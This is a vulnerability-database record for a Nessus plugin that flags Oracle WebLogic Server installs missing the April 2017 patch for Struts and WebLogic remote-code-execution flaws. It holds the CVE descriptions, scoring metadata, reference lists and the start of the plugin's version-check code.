DATABASE RESOURCES PRICING ABOUT US

{"id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition.\n (CVE-2016-1181)\n\n - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506)\n\n - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code.\n (CVE-2017-3531)\n\n - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)", "published": "2017-04-21T00:00:00", "modified": "2022-04-11T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/99528", "reporter": "This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.tenable.com/security/research/tra-2017-16", "https://www.zerodayinitiative.com/advisories/ZDI-16-444/", "http://www.nessus.org/u?eb4db3c7", "https://support.oracle.com/rs?type=doc&id=2228898.1", "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3506", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3531", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1181", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638", "http://www.nessus.org/u?623d2c22", "http://www.nessus.org/u?77e9c654"], "cvelist": ["CVE-2016-1181", "CVE-2017-3506", "CVE-2017-3531", "CVE-2017-5638"], "immutableFields": [], "lastseen": "2023-05-18T14:11:52", "viewCount": 1283, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "BAM-18242", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-5638"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2016-1181", "CVE-2017-3506", "CVE-2017-3531", "CVE-2017-5638"]}, {"type": "f5", "idList": ["F5:K40444230", "F5:K43451236", "SOL40444230"]}, {"type": "fedora", "idList": ["FEDORA:4B961604A720", "FEDORA:8830E6049DEB"]}, {"type": "fireeye", "idList": ["FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "github", "idList": ["GHSA-7JW3-5Q4W-89QG", "GHSA-J77Q-2QQG-6989", "GITHUB:0519EA92487B44F364A1B35C85049455"]}, {"type": "githubexploit", "idList": ["7BA07704-21CC-5BFC-A0F9-8FDA2BC84402"]}, {"type": "hackerone", "idList": ["H1:212022", "H1:212985", "H1:213069", "H1:810778"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "104BE807C8577FF816DF414B5A588FABB581711BB54758F6F49C7CAC17CD68BE", "107B029DD56A2199A3A87E51461350D452A0422C3E3D25CE9E1B91F71C36131B", "12780044E1A62D25F913723FBCBD5B926E91CC9AC8CA8FAA1DCE18D02D152689", "1815BD265DEB0EE550962E1526DA1FE75BACA3823A20A4BCDA8ED078F9EC9C8D", "1A977E1D46AE4CB4B7068DB341125931FAD75C28D6703503973FFF9BE917887F", "1D6C51DC7D1DD9D1A9F07B9737CE12B7F8F933D3089EBCB68A0BBCF75680D250", "23F8C1E67922626C0589CA86ED9B40D441D494E8B56CD8FF4A2EF76F18E6861F", "286378C830B748E29DFAEAB7AC19693EE4565D1CAB6189EAA20A975B835DFAD6", "29036B6FEB00571E2FBC00E867150134E5DF9C08AD44F9670B7C8B0109F99570", "2DD38E427DB50FDA5C4D07F52BDC62BA35206BA44BC185595E39ACAE88DD41C5", "35774A12657731256610BEB1ACB2AE99C105060354AA560F82DED28AE65A8B24", "366FA55EE0B09B40AABB041DB433F5E49FC0E42F7988440387EBE3EED9DBAE91", "39D4A3024CD82E0AB1412C8F0B7DE6C9C896CC59E99FBAB7A5A61175586A3211", "3C630E87CC8A98E980FC5838CF94096C676B99FA65014F79A0F1057053EEB9E0", "3CFF13ADA1D4912594BB3AC9D0D9ACB17881A208B1AD8998A1E8BD64DD6C5268", "3D8540513E9389E52505EF4CCF99C1FC5DC8928BFA49128170D48087D1264725", "3DAB255772B5C0465CD2A50FC27BF93D482025FE8D7247F3C147E19AC9F9AFD2", "3E3AF8AC7BA63076BEE8FFB670B3A3F27E0903C83526E54496E50EB2DF74B875", "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "4C800D760232A012AE25AED7F8AFCFF9E3EF3D9D48D3614E764CC6588F221519", "50F17354A0A89B52C1E061D02F78509C6F34AF2860DC46D6DFC82469E2AB6C29", "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "55C6EB16408836E84C4255320770BC4F60934779CE325008D25B4951C20115C1", "615E4369D0B07E7BA358AF447BD05A3ACC0720A255109ADB57E2A2080DB3607A", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "65DC12D6E8E0D53E6ED0AF1F356647C749F500509AAE6E4435FC95F00517F01C", "6858032AD0022691AF88FEDCEF29BB4CEA50172EAD995CAB6463B91C16637C1C", "68E7DB3D7E398B2706226213F9B1A94ACD374A065EE9538BCE2CF140B065CB08", "691466DAEE06683E49687F1AD61B1DE274EE44CA9F6E86B9BF8D7D76D6346999", "6AB5B24B612744A794E7F28CC88F04C811F4BB9710FE31917EFCB65EDDDF7C9A", "6F2C088BF5D78FB804760981ACFE38C9CC104BC5F9390812E5D324682512AD45", "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "71A473993D401FAFDA20A063C958EB3785E06B0F2833BBEB5FA0B1E2E3123139", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "8585A81D2C6357431DB37ADDF4189DBBFAC913BE555A9B6483BF16E8E8705C85", "867D9ECEAB40B111EE25A99AD07419623F566D5212284F0A2C5C9E2D13C72DF2", "88E396C29AABC664ACC3D5B0A3797EDDA0587772D5D9F452A2E356E7CC5BCD5D", "8AECCBE0CD244EF2C1818D4560A2112EBDDE17CF922BC7869D4367156735AD72", "9CC98367A213309185EDA7DC75FCDBBA5D5754142F33E0C8ED1B454D10CF416E", "9E3B1F6158EF5703EF54F7C3064A7EB99BF9523B8A6CCF05475346791179C879", "A09274BA1A31537EA391724E8C52797113E094AE9E4EAA66FB5A50D995921587", "A38279E551792BA29F1FA34034CD64E94266819C4862EDC7B206E7A748D269FD", "A49F8E92510CDD96D8127764BC310529CF44A60596DB14352FF329575652A707", "A4FDFC527D8A765D6247DDB806EE98612DA0FE7BCB4E133A742D7FA9A06E39DC", "AAE50909D8058934D5CCB989B4CEA17B72CABD2BC4CF08576581EC909FE087A7", "B4BA991763253D738BCAA9AB61AE50E1AA4C20D6F3366D5551C3051C29FEADB2", "BE523D88E9070A2DC41C20554C070BC6A203CA40E3C999CC7B9D52C82AF77DEF", "C24D4FCC97FD95E90382A4216040099F16203ABF61AF30281EF1C2E136253A42", "C270008C47088F4AB45570D101436BB116E08F304CC36AF51E0823C68AFCAAE8", "C6D76168198B9EF24D77F1D04BA06E30D33B0C7D71C8457114E69E1A43BB68AD", "C9594147E388237928595F1CF759F8EC355015BE6AC29A030A2FA3207D9B6DE4", "C9B215C2E990733679984F0C6E86DB20EA1ED143683D79CFE88293360577ED49", "C9D56908C5941D51F8B700D0AEB133B65A72D4A5D3A7FAA2D989A477B71C954D", "CD1AEA82D347BCF45C817F297F91F17B63798AE3055B653759D8342B9405F1E0", "D75C787D719F6B509B47AAA92C0EBBE969DDCD2CD7BAA1800C224FD759790609", "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "D9F3546932BD432766323A6E9A562D656E3EAC77AAB6EE3AAADFF6008E59BC30", "DEAFA2DB54593AA80919E191E6F6089E8FC07DD6414224DF7420DF6F55DF4BC8", "E31CD1CAA68AD6659A7C459337F50C896A6D30B1CC25BEF6FC361000F2ACE0D4", "E3BD856982B27C3FE93EC13A76D5806B5BB18B95DD328F70706B73BE68D790ED", "EA4BC9A6E1BC28B39AE0C360DA599139777EC05EDFDC5120E91AC3051300D3E7", "EB488D986A623E81C07D5F38DFFA754649938084B72DDAA698DEA6B41BB73C49", "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "F2A538AF2ED1CAABCF5F0891DB02363ECADA659FE7F2989D3CCD7668E4585622", "F5BAF336C0FFA1A9715652B899383A9C6D730D8ADE9E07CAD68C90971C7F8249", "F5D5AAF38F45575DCEBF7AD5E9B3D25AA8678ED2972A091BF0082B881BDC74A4", "F7297DEE78789012F7802C00A7D437B06424929237D39542808A1D9905687922", "F936FE55F38C08867ADBDA8E6F3802EAC3CA57726D86C3FDB2C0BC8583619B6F", "F9A935F07F0C2592550406829A333AA17FFA9DE5B312BF55A008E03FEAC4C43E", "FFF1402575E7BE1F32E231DF470BEDA94544D3C346FFE024F98E6A628264A23E"]}, {"type": "ics", "idList": ["AA20-133A", "ICSMA-20-184-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "jvn", "idList": ["JVN:03188560"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "mageia", "idList": ["MGASA-2016-0244"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "FEDORA_2016-21BD6A33AF.NASL", "FEDORA_2016-D717FDCF74.NASL", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2017_CPU.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "WEBSPHERE_711865.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310808523", "OPENVAS:1361412562310808530", "OPENVAS:1361412562310808538", "OPENVAS:1361412562310809478", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310810749", "OPENVAS:1361412562310811244"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2019", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2019", "ORACLE:CPUJAN2020", "ORACLE:CPUJUL2016", "ORACLE:CPUJUL2017", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2018"]}, {"type": "osv", "idList": ["OSV:GHSA-7JW3-5Q4W-89QG", "OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-1181", "RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "symantec", "idList": ["SMNTC-91068"]}, {"type": "talosblog", "idList": ["TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:64BCAF6F8AC86911192766ED3D6AA28D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:14FE8F511A83995781243081E1FAE933", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-1181", "UB:CVE-2017-5638"]}, {"type": "veracode", "idList": ["VERACODE:3644"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316"]}]}, "score": {"value": 9.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-1088"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2016-1181", "CVE-2017-3506", "CVE-2017-3531", "CVE-2017-5638"]}, {"type": "f5", "idList": ["F5:K43451236"]}, {"type": "fedora", "idList": ["FEDORA:8830E6049DEB"]}, {"type": "fireeye", "idList": ["FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["2ED15233-2A01-53F8-A939-8A4D06481CF4", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "EB488D986A623E81C07D5F38DFFA754649938084B72DDAA698DEA6B41BB73C49", "F5D5AAF38F45575DCEBF7AD5E9B3D25AA8678ED2972A091BF0082B881BDC74A4"]}, {"type": "ics", "idList": ["ICSMA-20-184-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379"]}, {"type": "nessus", "idList": ["FEDORA_2016-21BD6A33AF.NASL", "FEDORA_2016-D717FDCF74.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310810749"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2018"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdi", "idList": ["ZDI-16-444"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2016-1181", "epss": 0.02208, "percentile": 0.8777, "modified": "2023-05-06"}, {"cve": "CVE-2017-3506", "epss": 0.97362, "percentile": 0.99815, "modified": "2023-05-06"}, {"cve": "CVE-2017-3531", "epss": 0.00147, "percentile": 0.49274, "modified": "2023-05-06"}, {"cve": "CVE-2017-5638", "epss": 0.97548, "percentile": 0.99991, "modified": "2023-05-06"}], "vulnersScore": 9.9}, "_state": {"dependencies": 1684432139, "score": 1684433303, "epss": 0}, "_internal": {"score_hash": "9979958dea0a96787821d9209495c44c"}, "pluginID": "99528", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99528);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1181\",\n \"CVE-2017-3506\",\n \"CVE-2017-3531\",\n \"CVE-2017-5638\"\n );\n script_bugtraq_id(\n 91068,\n 91787,\n 96729,\n 97884\n );\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"TRA\", value:\"TRA-2017-16\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the\n Apache Struts component due to improper handling of\n multithreaded access to an ActionForm instance. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted multipart request, to execute\n arbitrary code or cause a denial of service condition.\n (CVE-2016-1181)\n\n - An unspecified flaw exists in the Web Services\n subcomponent that allows an unauthenticated, remote\n attacker to modify or delete arbitrary data accessible\n to the server. (CVE-2017-3506)\n\n - A remote code execution vulnerability exists in the Web\n Container subcomponent due to improper handling of\n reflected PartItem File requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to execute arbitrary code.\n (CVE-2017-3531)\n\n - A remote code execution vulnerability exists in the\n Apache Struts component in the Jakarta Multipart parser\n due to improper handling of the Content-Type,\n Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted header value in the HTTP\n request, to execute arbitrary code. (CVE-2017-5638)\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?623d2c22\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb4db3c7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2228898.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2017-16\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-16-444/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = 